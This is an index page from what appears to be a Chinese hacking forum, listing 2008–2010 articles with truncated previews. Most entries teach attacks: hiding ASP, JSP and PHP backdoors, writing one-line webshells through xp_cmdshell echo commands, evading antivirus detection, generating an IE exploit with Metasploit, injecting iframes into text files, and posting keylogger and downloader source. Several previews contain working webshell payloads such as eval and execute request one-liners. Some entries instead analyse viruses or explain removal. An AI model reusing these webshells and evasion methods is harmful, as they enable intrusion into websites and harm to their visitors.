学院标题关闭所有内容预览 | 展开所有内容预览
-
隐蔽的asp后门
[内容预览]
82 | 2010-03-30
今天说的是在管理员的后台登陆界面隐藏我们的后门,这是相对比较安全的,因为管理员的入口不是 经常换的,只要他的登陆界面在,我们的后门就在! 1.从我们的SHELL上找到管理员的入口页面 2.编辑它 在最后面...
[阅读全文]
-
TXT文件挂马
[内容预览]
411 | 2010-03-30
TXT文件中插入一段JAVA代码后后边的HTML代码就会被IE执行 受影响版本IE6 7 8 代码: ‘><script>alert(sb)</script> <iframe src=http://xxxxx.org width=500 height=500></iframe> 演示: 引用:...
[阅读全文]
-
SA权限ECHO写一句话
[内容预览]
10 | 2010-03-30
注入点是SA权限. xp_cmdshell是存在的. 找到网站主目录 dir d:\wwwroot 找到站点的目录后. Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\ok.asp echo ^<%eval request("#")%^> >d:\wwwroot\xx\ok.asp echo...
[阅读全文]
-
一句话木马的免杀处理
[内容预览]
75 | 2010-03-23
在进一步入侵服务器时,上传的文件会被服务器过滤掉,我们上传的WEBSHLL就无法运行了! 以蓝屏最小ASP木马为例子!进行如下修改。 原来代码是<%execute request("cmd")%> 把标签修改替换下来 为 <scrip...
[阅读全文]
-
[图文] 一个“兽兽门”木马的分析
[内容预览]
47 | 2010-03-23
俗语说的好,"前有狼,后有虎",虎年,对于互联网就像一个猛兽之年... 春节前大面积爆发的"极虎"病毒还让人心有余悸,黑色产业链"趁热打铁",目前国内兽兽门事件正热,趁大量围观群众在网上疯求"兽兽门"视频下载地...
[阅读全文]
-
[图文] 鬼影病毒分析报告
[内容预览]
1275 | 2010-03-23
一、鬼影病毒概述 这是一个木马下载器,使用了ring3恢复内核钩子、感染磁盘引导区(MBR)、多种方法结束杀毒软件等技术自启动并对抗杀毒软件。完全感染后,是一个看不到可疑文件、没有启动项、普通重装系统也无法...
[阅读全文]
-
网马0day(CVE-2010-0806)用Metasploit生成方法
[内容预览]
9 | 2010-03-20
一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb 二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。我改个了名字叫ie.rb 三、启动msfconsole 四、msf > use exploit/test/ie...
[阅读全文]
-
木马病毒隐身穿墙术解密之花指令和终止进程
[内容预览]
14 | 2010-03-20
在上一篇木马病毒隐身穿墙术解密中,已经对修改木马特征码和加壳方式和应对之策做了一个大致的了解,但木马的隐身和穿墙术远不止这两种,今天我们要了解的,就是另外两种攻击者喜欢使用的木马隐身技术:给木马程序加...
[阅读全文]
-
木马病毒隐身穿墙术解密之修改特征码和加壳
[内容预览]
11 | 2010-03-20
现在,木马病毒在各种安全防范措施的拦截之下,依然没有任何减少的迹象,甚至还在向更多的方向发展。在防范木马程序这个问题上,造成当前这种局面的主要因素之一,就是木马病毒的开发者和使用者,总是在不断地开发...
[阅读全文]
-
木马病毒隐身穿墙术解密之修改特征码和加壳
[内容预览]
22 | 2010-03-20
现在,木马病毒在各种安全防范措施的拦截之下,依然没有任何减少的迹象,甚至还在向更多的方向发展。在防范木马程序这个问题上,造成当前这种局面的主要因素之一,就是木马病毒的开发者和使用者,总是在不断地开发各...
[阅读全文]
-
[图文] 新的网马解密思路
[内容预览]
564 | 2010-03-20
先来睇睇网马代码 ,一句句来分析 红色个系注释 <%xu="&礴&jos&uhpLYU&礴&jos&ljgzg&礴&jos&uhpIu{tzLork&礴&ut&kxxux&xky{sk&tk~z&礴&Ykz&...
[阅读全文]
-
Jsp一句话 C/S端
[内容预览]
9 | 2010-03-20
<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 提交客户端 程序代码...
[阅读全文]
-
挂马的前置知识和类型
[内容预览]
15 | 2010-03-20
网站被黑,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结合实...
[阅读全文]
-
一个类似程序管理器的简单JSP木马
[内容预览]
32 | 2010-03-01
下面是JSP木马程序原代码: 文件名 adminIndex.jsp 注意:这里用到了一个包. org.apache.commons.fileupload.* 如果你有了这个包,可以把页面中 注释的部分去掉.即可实现文件上传功能. 这个是上传文件用的包 commons...
[阅读全文]
-
[图文] 纯ASM编写的病毒供学习使用
[内容预览]
51 | 2010-03-01
这是一只纯ASM编写的病毒,具备文件感染,入口代码变形,自身加密,EPO等功能,是一只无任何特征码的病毒,设计目的是为对抗反病毒软件的特征码杀毒、行为杀毒和虚拟机杀毒,现有代码未提供任何破坏功能,但会主动感...
[阅读全文]
-
剖析Linux病毒原型工作过程和关键环节
[内容预览]
10 | 2010-03-01
一、 介绍 写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结,同时向对这方面有兴趣的朋友做一个简单的介绍。阅读这篇文章你需要一些知识,要对ELF有所了解、能够阅读一些嵌入了汇编的C代码、了解...
[阅读全文]
-
从电脑中毒现象分辨识别 Web 网页木马
[内容预览]
13 | 2010-03-01
由于web网页木马有伪装性很强,而且杀毒软件对于一些web网页木马没有查杀能力,这种情况下,我们可以根据电脑工作时的表现识别web网页木马。通常,感染了web网页木马的电脑,有以下几种现象: 1、系统反应速度变慢...
[阅读全文]
-
仿机器狗写入到userinit.exe文件的下载者源码
[内容预览]
27 | 2010-02-16
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ; 仿机器狗的感染文件代码 ; by naitm(http://hi.baidu.com/naitm) ; ; ml /c /coff /nologo userinit.asm ; Link /align:0x10 /...
[阅读全文]
-
锁定病毒藏身之处 提高操作系统扫描效率
[内容预览]
20 | 2010-02-16
网友在平时进行系统安全检测时一般都会采取全盘扫描的方法,殊不知全盘扫描既浪费时间,又在无形中缩短了硬盘的寿命。下面介绍的新方法,只需扫描一个文件夹,同样可以达到全盘扫描的效果! 跟病毒作斗争久了,大家...
[阅读全文]
-
另类隐藏PHP木马的方法
[内容预览]
67 | 2010-02-05
运行环境:Linux + apache 将php木马后缀改成图片类后缀,然后在木马目录或其根目录创建一个.htaccess文件(或在原有的.htaccess文件中加入) <FilesMatch "文件名"> SetHandler application/x-httpd-php ...
[阅读全文]
-
[图文] 揭秘网页挂马工作原理
[内容预览]
364 | 2010-01-10
通常,微软IE工作过程描述如下: 作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电...
[阅读全文]
-
键盘记录代码
[内容预览]
232 | 2009-12-22
#define _WIN32_WINNT 0x0501 #include <windows.h> // Definitions int LogKey(HANDLE hLog, UINT vKey); LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam); int WINAPI WinMa...
[阅读全文]
-
[图文] 解密的奥运专版网站维护工具(加强版)及后门全分析
[内容预览]
271 | 2009-12-20
这个shell的界面还是不错的,清爽淡雅,可惜后门还是大大的。 这个程序的加密较为复杂,除了常规的VBScript.Encode加密外,还采用了至少3个自定义函数加密。这3个函数的解密函数为 程序代码 Function ...
[阅读全文]
-
[图文] 教你揪出伪装系统木马并清除
[内容预览]
366 | 2009-12-17
面对日新月异的病毒和木马,有时利用手工检查及清除病毒,还是有必要的,本文以伪装成系统的Wmiprvse.exe进程木马为例,来对其木马的清除做以循序渐进的讲解。 首先,按住键盘上的“Ctrl+Alt+Del”键,将“任务管...
[阅读全文]
-
swf网马的解密
[内容预览]
12 | 2009-12-15
现在都流行用flash挂马了,一般都用SWF Encrypt来加密,很难反编译出其中的AS脚本。但是基于无论是AS还是JS来heapspray,其中都会调用import flash.external.*;ExternalInterface.call("eval","xxxx");。如果是这种形...
[阅读全文]
-
“色情炸弹”大肆传播淫秽图片 五秒清盘
[内容预览]
100 | 2009-12-13
安全机构监测到一个“大胆”的“色情炸弹”变种aey病毒, 该病毒会将淫秽图片设置为用户的桌面壁纸,同时删除用户计算机上除C盘外,D盘到G盘分区中的全部文件,给用户带来巨大的、无法挽回的损失。 据反病毒专家介绍...
[阅读全文]
-
Svchost.exe:进程详解及病毒清除方法
[内容预览]
127 | 2009-12-13
Svchost.exe在windows进程中占据很大一部分的资源,而且这个进程非常容易被病毒所利用。Svchost.exe被病毒利用之后,系统常会弹出Svchost.exe错误,当然Svchost病毒也有专杀工具。那么Svchost.exe是什么进程?Svchost...
[阅读全文]
-
只要用这一招就能拒绝全部的病毒木马
[内容预览]
281 | 2009-12-12
如果你是Windows2k 或xp的用户,那么你一仔细看咯,在这里教大家一招金蝉脱窍 ―― 而且只需要这一招克就能死所有病毒!! 如果你是新装的系统(或者是你能确认你的系统当前是无毒的),那就再好不过了,现在就立即就打开...
[阅读全文]
-
ASP定时挂马程序
[内容预览]
172 | 2009-07-30
朋友说网站被入侵了,刚清除后不久又被挂上,感觉有个自动挂马的程序,于是写了个清除的程序和挂马的小脚本程序. 核心代码: For Each jkfile In Folder_Obj.files If FSO.GetExtenSionName(Lcase(jkfile))="asp" O...
[阅读全文]
-
[图文] 木马是怎样攻入Ecshop商城的
[内容预览]
209 | 2009-07-30
Ecshop是一套网络商城建站系统,主要服务于想快捷搭建商城系统的用户,该系统是个人建立商城的主流软件。 在网络上,主要有两种类型的网络购物,一类是像淘宝这样的C2C网站,另一类是像卓越这样的B2C网站。B2C网站...
[阅读全文]
-
[图文] 瑞星PK网页挂马,云安全拦马战病毒
[内容预览]
328 | 2009-04-14
1、最易被“挂马”的几类网站及防范 挂马这个词目前我们似乎经常能听到,那么什么是挂马呢?挂马就是黑客入侵了一些网站后,将自己编写的网页木马嵌入被黑网站的主页中,利用被黑网站的流量将自己的网页木马传播开...
[阅读全文]
-
病毒专杀VBS模板
[内容预览]
124 | 2008-12-27
附:要学习VBS专杀的写法可以参考我以前这篇文章《VBS编程打造自己的病毒专杀工具》,抛砖引玉罢了……多谢小G,这套模板才得以及时趋于完善,不足之处自然还很多。也希望大家的加入。众人拾柴火焰高嘛。 '-病毒专杀...
[阅读全文]
-
免杀甲壳虫专版远控软件时的一个启发
[内容预览]
236 | 2008-12-18
免杀甲壳虫专版远控软件时的一个启发,对各位免杀朋友绝对有所帮助和启发。 今天在做甲壳虫专版远程控制的免杀时,碰到个小麻烦,后来多方面思考解决了 ,觉得这段免杀过程有点意思,希望对某些免杀的朋友有帮助。...
[阅读全文]